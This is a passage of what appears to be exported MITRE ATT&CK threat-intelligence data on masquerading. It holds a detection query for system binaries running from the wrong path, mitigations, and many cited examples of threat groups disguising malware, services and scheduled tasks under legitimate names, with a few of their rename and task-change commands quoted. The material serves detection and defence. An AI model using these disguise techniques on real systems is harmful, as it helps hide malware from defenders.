  OR (exe=lsm.exe AND image_path!="C:\\Windows\\System32\\lsm.exe")
  OR (exe=explorer.exe AND image_path!="C:\\Windows\\explorer.exe"))&lt;/code&gt;
Process Metadata
Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity.
Code Signing
Require signed binaries and images.
Execution Prevention
Use tools that restrict program execution via application control by attributes other than file name for common operating system utilities that are needed.
Restrict File and Directory Permissions
Use file system access controls to protect folders such as C:\Windows\System32.
2016 Ukraine Electric Power Attack
During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files.(Citation: Dragos Crashoverride 2017)
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used file names beginning with USERS, SYSUSER, and SYSLOG for [DEADEYE](https://attack.mitre.org/software/S1052), and changed [KEYPLUG](https://attack.mitre.org/software/S1051) file extensions from .vmp  to .upx likely to avoid hunting detections.(Citation: Mandiant APT41)
C0018
For [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors renamed a [Sliver](https://attack.mitre.org/software/S0633) payload to `vmware_kb.exe`.(Citation: Cisco Talos Avos Jun 2022)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors renamed a malicious executable to `rundll32.exe` to allow it to blend in with other Windows system files.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used a legitimate Windows executable and secure directory for their payloads to bypass UAC.(Citation: McAfee Honeybee) 
Operation Sharpshooter
During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), threat actors installed [Rising Sun](https://attack.mitre.org/software/S0448) in the Startup folder and disguised it as `mssync.exe`.(Citation: McAfee Sharpshooter December 2018)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors renamed some tools and executables to appear as legitimate programs.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) renamed software and DLLs with legitimate names to appear benign.(Citation: Volexity SolarWinds)(Citation: Microsoft Analyzing Solorigate Dec 2020)
APT1
The file name AcroRD32.exe, a legitimate process name for Adobe's Acrobat Reader, was used by [APT1](https://attack.mitre.org/groups/G0006) as a name for malware.(Citation: Mandiant APT1)(Citation: Mandiant APT1 Appendix)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has changed extensions on files containing exfiltrated data to make them appear benign, and renamed a web shell instance to appear as a legitimate OWA page.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has renamed malicious DLLs with legitimate names to appear benign; they have also created an Azure AD certificate with a Common Name that matched the display name of the compromised service principal.(Citation: SentinelOne NobleBaron June 2021)(Citation: Mandiant APT29 Microsoft 365 2022)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has renamed a NetCat binary to kb-10233.exe to masquerade as a Windows update. [APT32](https://attack.mitre.org/groups/G0050) has also renamed a Cobalt Strike beacon payload to install_flashplayers.exe. (Citation: Cybereason Cobalt Kitty 2017)(Citation: Volexity Ocean Lotus November 2020)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used malware disguised as Mozilla Firefox and a tool named mfevtpse.exe to proxy C2 communications, closely mimicking a legitimate McAfee file mfevtps.exe.(Citation: BitDefender Chafer May 2020)(Citation: FBI FLASH APT39 September 2020)
APT41
[APT41](https://attack.mitre.org/groups/G0096) attempted to masquerade their files as popular anti-virus software.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
Aoqin Dragon
[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has used fake icons including antivirus and external drives to disguise malicious payloads.(Citation: SentinelOne Aoqin Dragon June 2022)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has given malware the same name as an existing file on the file share server to cause users to unwittingly launch and install the malware on additional systems.(Citation: Secureworks BRONZE BUTLER Oct 2017)
BackdoorDiplomacy
[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has dropped implants in folders named for legitimate software.(Citation: ESET BackdoorDiplomacy Jun 2021)
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has masqueraded their XMRIG payload name by naming it wercplsupporte.dll after the legitimate wercplsupport.dll file.(Citation: RedCanary Mockingbird May 2020)
Carbanak
[Carbanak](https://attack.mitre.org/groups/G0008) has named malware "svchost.exe," which is the name of the Windows shared service host program.(Citation: Kaspersky Carbanak)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has renamed malware to GoogleUpdate.exe and WinRAR to jucheck.exe, RecordedTV.ms, teredo.tmp, update.exe, and msadcs1.exe.(Citation: Cycraft Chimera April 2020)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) has used malware that is disguised as a Secure Shell (SSH) tool.(Citation: Microsoft DUBNIUM June 2016)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) used the command `move [file path] c:\windows\system32\spool\prtprocs\x64\spool.dll` to move and register a malicious DLL name as a Windows print processor, which eventually was loaded by the Print Spooler service.(Citation: TrendMicro EarthLusca 2022)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has masqueraded WAR files to look like legitimate packages such as, wsexample.war, wsexamples.com, examples.war, and exampl3s.war.(Citation: Sygnia Elephant Beetle Jan 2022)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has attempted to run Darkside ransomware with the filename sleep.exe.(Citation: CrowdStrike Carbon Spider August 2021)
Ferocious Kitten
[Ferocious Kitten](https://attack.mitre.org/groups/G0137) has named malicious files &lt;code&gt;update.exe&lt;/code&gt; and loaded them into the compromise host's “Public” folder.(Citation: Kaspersky Ferocious Kitten Jun 2021)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has named binaries and configuration files svhost and dllhost respectively to appear legitimate.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used legitimate process names to hide malware including &lt;code&gt;svchosst&lt;/code&gt;.(Citation: Unit 42 Gamaredon February 2022)
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) used fake updates for FlashPlayer plugin and Google Chrome as initial infection vectors.(Citation: Crowdstrike Indrik November 2018)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has dropped their malware into legitimate installed software paths including: `C:\ProgramFiles\Realtek\Audio\HDA\AERTSr.exe`, `C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitRdr64.exe`, `C:\Program Files (x86)\Adobe\Flash Player\AddIns\airappinstaller\airappinstall.exe`, and `C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd64.exe`.(Citation: Microsoft NICKEL December 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has renamed malware to legitimate names such as &lt;code&gt;ESTCommon.dll&lt;/code&gt; or &lt;code&gt;patch.dll&lt;/code&gt;.(Citation: KISA Operation Muzabi)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has renamed malicious code to disguise it as Microsoft's narrator and other legitimate files.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)(Citation: Qualys LolZarus)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has disguised their exfiltration malware as `ZoomVideoApp.exe`.(Citation: Kaspersky LuminousMoth July 2021)
Machete
[Machete](https://attack.mitre.org/groups/G0095)'s [Machete](https://attack.mitre.org/software/S0409) MSI installer has masqueraded as a legitimate Adobe Acrobat Reader installer.(Citation: 360 Machete Sep 2020)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used `dllhost.exe` to mask Fast Reverse Proxy (FRP) and `MicrosoftOutLookUpdater.exe` for Plink.(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has disguised malicious executables and used filenames and Registry key names associated with Windows Defender.(Citation: FireEye MuddyWater Mar 2018)(Citation: Talos MuddyWater May 2019)(Citation: Anomali Static Kitten February 2021)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has used names like `adobeupdate.dat` and `PotPlayerDB.dat` to disguise [PlugX](https://attack.mitre.org/software/S0013), and a file named `OneDrive.exe` to load a [Cobalt Strike](https://attack.mitre.org/software/S0154) payload.(Citation: Recorded Future REDDELTA July 2020)
Naikon
[Naikon](https://attack.mitre.org/groups/G0019) has disguised malicious programs as Google Chrome, Adobe, and VMware executables.(Citation: Bitdefender Naikon April 2021)
PROMETHIUM
[PROMETHIUM](https://attack.mitre.org/groups/G0056) has disguised malicious installer files by bundling them with legitimate software installers.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) installed its payload in the startup programs folder as "Baidu Software Update." The group also adds its second stage payload to the startup programs as “Net Monitor."(Citation: Cymmetria Patchwork) They have also dropped [QuasarRAT](https://attack.mitre.org/software/S0262) binaries as files named microsoft_network.exe and crome.exe.(Citation: Volexity Patchwork June 2018)
Poseidon Group
[Poseidon Group](https://attack.mitre.org/groups/G0033) tools attempt to spoof anti-virus processes as a means of self-defense.(Citation: Kaspersky Poseidon Group)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has used shell scripts which download mining executables and saves them with the filename "java".(Citation: Talos Rocke August 2018)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has avoided detection by naming a malicious binary explorer.exe.(Citation: ESET Telebots Dec 2016)(Citation: US District Court Indictment GRU Unit 74455 October 2020)
SideCopy
[SideCopy](https://attack.mitre.org/groups/G1008) has used a legitimate DLL file name, `Duser.dll` to disguise a malicious remote access tool.(Citation: MalwareBytes SideCopy Dec 2021)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has named malicious files &lt;code&gt;rekeywiz.exe&lt;/code&gt; to match the name of a legitimate Windows executable.(Citation: Rewterz Sidewinder COVID-19 June 2020)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has named its backdoor "WINWORD.exe".(Citation: Group IB Silence Sept 2018)
Sowbug
[Sowbug](https://attack.mitre.org/groups/G0054) named its tools to masquerade as Windows or Adobe Reader software, such as by using the file name adobecms.exe and the directory &lt;code&gt;CSIDL_APPDATA\microsoft\security&lt;/code&gt;.(Citation: Symantec Sowbug Nov 2017)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has used file names to mimic legitimate Windows files or system functionality.(Citation: Proofpoint TA2541 February 2022)
TEMP.Veles
[TEMP.Veles](https://attack.mitre.org/groups/G0088) has renamed files to look like legitimate files, such as Windows update files or Schneider Electric application files.(Citation: FireEye TRITON 2019)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has replaced .dockerd and .dockerenv with their own scripts and cryptocurrency mining software.(Citation: Cisco Talos Intelligence Group)
Transparent Tribe
[Transparent Tribe](https://attack.mitre.org/groups/G0134) can mimic legitimate Windows directories by using the same icons and names.(Citation: Kaspersky Transparent Tribe August 2020)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has hidden payloads in Flash directories and fake installer files.(Citation: TrendMicro Tropic Trooper May 2020)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used legitimate looking filenames for compressed copies of the ntds.dit database and used names including cisco_up.exe, cl64.exe, vm3dservice.exe, watchdogd.exe, Win.exe, WmiPreSV.exe, and WmiPrvSE.exe for the Earthworm and Fast Reverse Proxy tools.(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)
WIRTE
[WIRTE](https://attack.mitre.org/groups/G0090) has named a first stage dropper `Kaspersky Update Agent` in order to appear legitimate.(Citation: Kaspersky WIRTE November 2021)
Whitefly
[Whitefly](https://attack.mitre.org/groups/G0107) has named the malicious DLL the same name as DLLs belonging to legitimate software from various security vendors.(Citation: Symantec Whitefly March 2019)
admin@338
[admin@338](https://attack.mitre.org/groups/G0018) actors used the following command to rename one of their tools to a benign file name: &lt;code&gt;ren "%temp%\upload" audiodg.exe&lt;/code&gt;(Citation: FireEye admin@338)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has been seen changing malicious files to appear legitimate.(Citation: District Court of NY APT10 Indictment December 2018)
ANDROMEDA
[ANDROMEDA](https://attack.mitre.org/software/S1074) has been installed to `C:\Temp\TrustedInstaller.exe` to mimic a legitimate Windows installer service.(Citation: Mandiant Suspected Turla Campaign February 2023)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to rename its payload to ESTCommon.dll to masquerade as a DLL belonging to ESTsecurity.(Citation: Malwarebytes Kimsuky June 2021)
BADNEWS
[BADNEWS](https://attack.mitre.org/software/S0128) attempts to hide its payloads using legitimate filenames.(Citation: PaloAlto Patchwork Mar 2018)
BLINDINGCAN
[BLINDINGCAN](https://attack.mitre.org/software/S0520) has attempted to hide its payload by using legitimate file names such as "iconcache.db".(Citation: US-CERT BLINDINGCAN Aug 2020)
BackConfig
[BackConfig](https://attack.mitre.org/software/S0475) has hidden malicious payloads in &lt;code&gt;%USERPROFILE%\Adobe\Driver\dwg\&lt;/code&gt; and mimicked the legitimate DHCP service binary.(Citation: Unit 42 BackConfig May 2020)
Bad Rabbit
[Bad Rabbit](https://attack.mitre.org/software/S0606) has masqueraded as a Flash Player installer through the executable file &lt;code&gt;install_flash_player.exe&lt;/code&gt;.(Citation: ESET Bad Rabbit)(Citation: Secure List Bad Rabbit)
Bazar
The [Bazar](https://attack.mitre.org/software/S0534) loader has named malicious shortcuts "adobe" and mimicked communications software.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)(Citation: CrowdStrike Wizard Spider October 2020)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has renamed malicious code to `msacm32.dll` to hide within a legitimate library; earlier versions were disguised as `winhelp`.(Citation: Talos Bisonal Mar 2020) 
Black Basta
The [Black Basta](https://attack.mitre.org/software/S1070) dropper has mimicked an application for creating USB bootable drivers.(Citation: Check Point Black Basta October 2022)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) has used a payload file named OneDrive.update to appear benign.(Citation: Palo Alto Brute Ratel July 2022)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) has named component DLLs "RapportGP.dll" to match those used by the security company Trusteer.(Citation: Medium Ali Salem Bumblebee April 2022)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) has disguised a malicious .app file as a Flash Player update.(Citation: MacKeeper Bundlore Apr 2019)
Calisto
[Calisto](https://attack.mitre.org/software/S0274)'s installation file is an unsigned DMG image under the guise of Intego’s security solution for mac.(Citation: Securelist Calisto July 2018)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) has masqueraded as Windows system file names, as well as "chkntfs.exe" and "syscron.exe".(Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)
ChChes
[ChChes](https://attack.mitre.org/software/S0144) copies itself to an .exe file with a filename that is likely intended to imitate Norton Antivirus but has several letters reversed (e.g. notron.exe).(Citation: PWC Cloud Hopper Technical Annex April 2017)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) has used an unsigned, crafted DLL module named &lt;code&gt;hha.dll&lt;/code&gt; that was designed to look like a legitimate 32-bit Windows DLL.(Citation: Cybereason Chaes Nov 2020)
Chinoxy
[Chinoxy](https://attack.mitre.org/software/S1041) has used the name `eoffice.exe` in attempt to appear as a legitimate file.(Citation: Bitdefender FunnyDream Campaign November 2020)
Cuba
[Cuba](https://attack.mitre.org/software/S0625) has been disguised as legitimate 360 Total Security Antivirus and OpenVPN programs.(Citation: McAfee Cuba April 2021) 
Cyclops Blink
[Cyclops Blink](https://attack.mitre.org/software/S0687) can rename its running process to &lt;code&gt;[kworker:0/1]&lt;/code&gt; to masquerade as a Linux kernel thread. [Cyclops Blink](https://attack.mitre.org/software/S0687) has also named RC scripts used for persistence after WatchGuard artifacts.(Citation: NCSC Cyclops Blink February 2022)
DRATzarus
[DRATzarus](https://attack.mitre.org/software/S0694) has been named `Flash.exe`, and its dropper has been named `IExplorer`.(Citation: ClearSky Lazarus Aug 2020)
DanBot
[DanBot](https://attack.mitre.org/software/S1014) files have been named `UltraVNC.exe` and `WINVNC.exe` to appear as legitimate VNC tools.(Citation: ClearSky Siamesekitten August 2021)
DarkComet
[DarkComet](https://attack.mitre.org/software/S0334) has dropped itself onto victim machines with file names such as WinDefender.Exe and winupdate.exe in an apparent attempt to masquerade as a legitimate file.(Citation: TrendMicro DarkComet Sept 2014)
Daserf
[Daserf](https://attack.mitre.org/software/S0187) uses file and folder names related to legitimate programs in order to blend in, such as HP, Intel, Adobe, and perflogs.(Citation: Symantec Tick Apr 2016)
Doki
[Doki](https://attack.mitre.org/software/S0600) has disguised a file as a Linux kernel module.(Citation: Intezer Doki July 20)
Dtrack
One of [Dtrack](https://attack.mitre.org/software/S0567) can hide in replicas of legitimate programs like OllyDbg, 7-Zip, and FileZilla.(Citation: CyberBit Dtrack)
EKANS
[EKANS](https://attack.mitre.org/software/S0605) has been disguised as &lt;code&gt;update.exe&lt;/code&gt; to appear as a valid executable.(Citation: Dragos EKANS)
Elise
If installing itself as a service fails, [Elise](https://attack.mitre.org/software/S0081) instead writes itself as a file named svchost.exe saved in %APPDATA%\Microsoft\Network.(Citation: Lotus Blossom Jun 2015)
Felismus
[Felismus](https://attack.mitre.org/software/S0171) has masqueraded as legitimate Adobe Content Management System files.(Citation: Forcepoint Felismus Mar 2017)
FinFisher
[FinFisher](https://attack.mitre.org/software/S0182) renames one of its .dll files to uxtheme.dll in an apparent attempt to masquerade as a legitimate file.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)
FoggyWeb
[FoggyWeb](https://attack.mitre.org/software/S0661) can be disguised as a Visual Studio file such as `Windows.Data.TimeZones.zh-PH.pri` to evade detection. Also, [FoggyWeb](https://attack.mitre.org/software/S0661)'s loader can mimic a genuine `dll` file that carries out the same import functions as the legitimate Windows `version.dll` file.(Citation: MSTIC FoggyWeb September 2021)
Fysbis
[Fysbis](https://attack.mitre.org/software/S0410) has masqueraded as trusted software rsyncd and dbus-inotifier.(Citation: Fysbis Dr Web Analysis)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) has named malicious binaries `serv.exe`, `winprint.dll`, and `chrome_elf.dll` and has set its persistence in the Registry with the key value &lt;code&gt;Chrome Update&lt;/code&gt; to appear legitimate.(Citation: ESET Gelsemium June 2021)
GoldMax
[GoldMax](https://attack.mitre.org/software/S0588) has used filenames that matched the system name, and appeared as a scheduled task impersonating systems management software within the corresponding ProgramData subfolder.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike StellarParticle January 2022)
GoldenSpy
[GoldenSpy](https://attack.mitre.org/software/S0493)'s setup file installs initial executables under the folder &lt;code&gt;%WinDir%\System32\PluginManager&lt;/code&gt;.(Citation: Trustwave GoldenSpy June 2020)	
Goopy
[Goopy](https://attack.mitre.org/software/S0477) has impersonated the legitimate goopdate.dll, which was dropped on the target system with a legitimate GoogleUpdate.exe.(Citation: Cybereason Cobalt Kitty 2017)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) has named malicious browser extensions and update files to appear legitimate.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)
Green Lambert
[Green Lambert](https://attack.mitre.org/software/S0690) has been disguised as a Growl help file.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021)
HTTPBrowser
[HTTPBrowser](https://attack.mitre.org/software/S0070)'s installer contains a malicious file named navlu.dll to decrypt and run the RAT. navlu.dll is also the name of a legitimate Symantec DLL.(Citation: ZScaler Hacking Team)
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) has used the name `postgressql.exe` to mask a malicious payload.(Citation: ESET Hermetic Wizard March 2022)
HermeticWizard
[HermeticWizard](https://attack.mitre.org/software/S0698) has been named `exec_32.dll` to mimic a legitimate MS Outlook .dll.(Citation: ESET Hermetic Wizard March 2022)
IceApple
[IceApple](https://attack.mitre.org/software/S1022) .NET assemblies have used `App_Web_` in their file names to appear legitimate.(Citation: CrowdStrike IceApple May 2022)
InnaputRAT
[InnaputRAT](https://attack.mitre.org/software/S0259) variants have attempted to appear legitimate by using the file names SafeApp.exe and NeutralApp.exe.(Citation: ASERT InnaputRAT April 2018)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) has disguised its droppers as legitimate software or documents, matching their original names and locations, and saved its files as mpr.dll in the Windows folder.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)
Ixeshe
[Ixeshe](https://attack.mitre.org/software/S0015) has used registry values and file names associated with Adobe software, such as AcroRd32.exe.(Citation: Trend Micro IXESHE 2012)
KGH_SPY
[KGH_SPY](https://attack.mitre.org/software/S0526) has masqueraded as a legitimate Windows tool.(Citation: Cybereason Kimsuky November 2020)
KOCTOPUS
[KOCTOPUS](https://attack.mitre.org/software/S0669) has been disguised as legitimate software programs associated with the travel and airline industries.(Citation: MalwareBytes LazyScripter Feb 2021) 
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has created a shortcut called "Anti virus service.lnk" in an apparent attempt to masquerade as a legitimate file.(Citation: Talos Konni May 2017)
LightNeuron
[LightNeuron](https://attack.mitre.org/software/S0395) has used filenames associated with Exchange and Outlook for binary and configuration files, such as &lt;code&gt;winmail.dat&lt;/code&gt;.(Citation: ESET LightNeuron May 2019)
LookBack
[LookBack](https://attack.mitre.org/software/S0582) has a C2 proxy tool that masquerades as &lt;code&gt;GUP.exe&lt;/code&gt;, which is software used by Notepad++.(Citation: Proofpoint LookBack Malware Aug 2019)
MCMD
[MCMD](https://attack.mitre.org/software/S0500) has been named Readme.txt to appear legitimate.(Citation: Secureworks MCMD July 2019)
Machete
[Machete](https://attack.mitre.org/software/S0409) renamed payloads to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python executables.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)
MarkiRAT
[MarkiRAT](https://attack.mitre.org/software/S0652) can masquerade as &lt;code&gt;update.exe&lt;/code&gt; and &lt;code&gt;svehost.exe&lt;/code&gt;; it has also mimicked legitimate Telegram and Chrome files.(Citation: Kaspersky Ferocious Kitten Jun 2021)
MechaFlounder
[MechaFlounder](https://attack.mitre.org/software/S0459) has been downloaded as a file named lsass.exe, which matches the legitimate Windows file.(Citation: Unit 42 MechaFlounder March 2019)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has disguised an MSI file as the Adobe Acrobat Reader Installer and has masqueraded payloads as OneDrive, WhatsApp, or Spotify, for example.(Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019) 
Mis-Type
[Mis-Type](https://attack.mitre.org/software/S0084) saves itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.(Citation: Cylance Dust Storm)(Citation: Microsoft DTC)
Misdat
[Misdat](https://attack.mitre.org/software/S0083) saves itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.(Citation: Cylance Dust Storm)(Citation: Microsoft DTC)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) has masqueraded as legitimate software including TeamViewer and macOS Finder.(Citation: Red Canary NETWIRE January 2020)
NOKKI
[NOKKI](https://attack.mitre.org/software/S0353) is written to %LOCALAPPDATA%\MicroSoft Updatea\svServiceUpdate.exe prior being executed in a new process in an apparent attempt to masquerade as a legitimate folder and file.(Citation: Unit 42 NOKKI Sept 2018)
Nebulae
[Nebulae](https://attack.mitre.org/software/S0630) uses functions named &lt;code&gt;StartUserModeBrowserInjection&lt;/code&gt; and &lt;code&gt;StopUserModeBrowserInjection&lt;/code&gt; indicating that it's trying to imitate chrome_frame_helper.dll.(Citation: Bitdefender Naikon April 2021)
NightClub
[NightClub](https://attack.mitre.org/software/S1090) has chosen file names to appear legitimate including EsetUpdate-0117583943.exe for its dropper.(Citation: MoustachedBouncer ESET August 2023)
OLDBAIT
[OLDBAIT](https://attack.mitre.org/software/S0138) installs itself in &lt;code&gt;%ALLUSERPROFILE%\\Application Data\Microsoft\MediaPlayer\updatewindws.exe&lt;/code&gt;; the directory name is missing a space and the file name is missing the letter "o."(Citation: FireEye APT28)
OSX/Shlayer
[OSX/Shlayer](https://attack.mitre.org/software/S0402) can masquerade as a Flash Player update.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)
Octopus
[Octopus](https://attack.mitre.org/software/S0340) has been disguised as legitimate programs, such as Java and Telegram Messenger.(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)
OwaAuth
[OwaAuth](https://attack.mitre.org/software/S0072) uses the filename owaauth.dll, which is a legitimate file that normally resides in &lt;code&gt;%ProgramFiles%\Microsoft\Exchange Server\ClientAccess\Owa\Auth\&lt;/code&gt;; the malicious file by the same name is saved in &lt;code&gt;%ProgramFiles%\Microsoft\Exchange Server\ClientAccess\Owa\bin\&lt;/code&gt;.(Citation: Dell TG-3390)
PUNCHBUGGY
[PUNCHBUGGY](https://attack.mitre.org/software/S0196) mimics filenames from %SYSTEM%\System32 to hide DLLs in %WINDIR% and/or %TEMP%.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)
PcShare
[PcShare](https://attack.mitre.org/software/S1050) has been named `wuauclt.exe` to appear as the legitimate Windows Update AutoUpdate Client.(Citation: Bitdefender FunnyDream Campaign November 2020)
Penquin
[Penquin](https://attack.mitre.org/software/S0587) has mimicked the Cron binary to hide itself on compromised systems.(Citation: Leonardo Turla Penquin May 2020)
PipeMon
[PipeMon](https://attack.mitre.org/software/S0501) modules are stored on disk with seemingly benign names including use of a file extension associated with a popular word processor.(Citation: ESET PipeMon May 2020)
PlugX
[PlugX](https://attack.mitre.org/software/S0013) has been disguised as legitimate Adobe and PotPlayer files.(Citation: Proofpoint TA416 Europe March 2022)
Pony
[Pony](https://attack.mitre.org/software/S0453) has used the Adobe Reader icon for the downloaded file to look more trustworthy.(Citation: Malwarebytes Pony April 2016)	
PowGoop
[PowGoop](https://attack.mitre.org/software/S1046) has used a DLL named Goopdate.dll to impersonate a legitimate Google update file.(Citation: DHS CISA AA22-055A MuddyWater February 2022)
PyDCrypt
[PyDCrypt](https://attack.mitre.org/software/S1032) has dropped [DCSrv](https://attack.mitre.org/software/S1033) under the `svchost.exe` name to disk.(Citation: Checkpoint MosesStaff Nov 2021)
Pysa
[Pysa](https://attack.mitre.org/software/S0583) has executed a malicious executable by </t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may attempt to manipulate the name of a task or service to make it appear legitimate or benign.
Scheduled Job Metadata
Monitor for contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.
Scheduled Job Modification
Monitor for changes made to scheduled jobs for unexpected modifications to execution launch
Service Creation
Monitor for newly constructed services/daemons. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Service Metadata
Monitor for changes made to services for unexpected modifications to names, descriptions, and/or start types
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used `SCHTASKS  /Change` to modify legitimate scheduled tasks to run malicious code.(Citation: Mandiant APT41)
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors named a malicious scheduled task "WinUpdate" for persistence.(Citation: Talos Frankenstein June 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) named tasks `\Microsoft\Windows\SoftwareProtectionPlatform\EventCacheManager` in order to appear legitimate.(Citation: Volexity SolarWinds)
APT-C-36
[APT-C-36](https://attack.mitre.org/groups/G0099) has disguised its scheduled tasks as those used by Google.(Citation: QiAnXin APT-C-36 Feb2019)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has used hidden or non-printing characters to help masquerade service names, such as appending a Unicode no-break space character to a legitimate service name. [APT32](https://attack.mitre.org/groups/G0050) has also impersonated the legitimate Flash installer file name "install_flashplayer.exe".(Citation: FireEye APT32 May 2017)
APT41
[APT41](https://attack.mitre.org/groups/G0096) has created services to appear as benign system tools.(Citation: Group IB APT 41 June 2021)
BITTER
[BITTER](https://attack.mitre.org/groups/G1002) has disguised malware as a Windows Security update service.(Citation: Cisco Talos Bitter Bangladesh May 2022)
BackdoorDiplomacy
[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has disguised their backdoor droppers with naming conventions designed to blend into normal operations.(Citation: ESET BackdoorDiplomacy Jun 2021)
Carbanak
[Carbanak](https://attack.mitre.org/groups/G0008) has copied legitimate service names to use for malicious services.(Citation: Kaspersky Carbanak)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has used scheduled tasks names such as `acrotyr` and `AppServicesr` to mimic the same names in a compromised network's `C:\Windows` directory.(Citation: Mandiant FIN13 Aug 2022)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has renamed the "psexec" service name to "mstdc" to masquerade as a legitimate Windows service.(Citation: FireEye FIN6 Apr 2019)	
FIN7
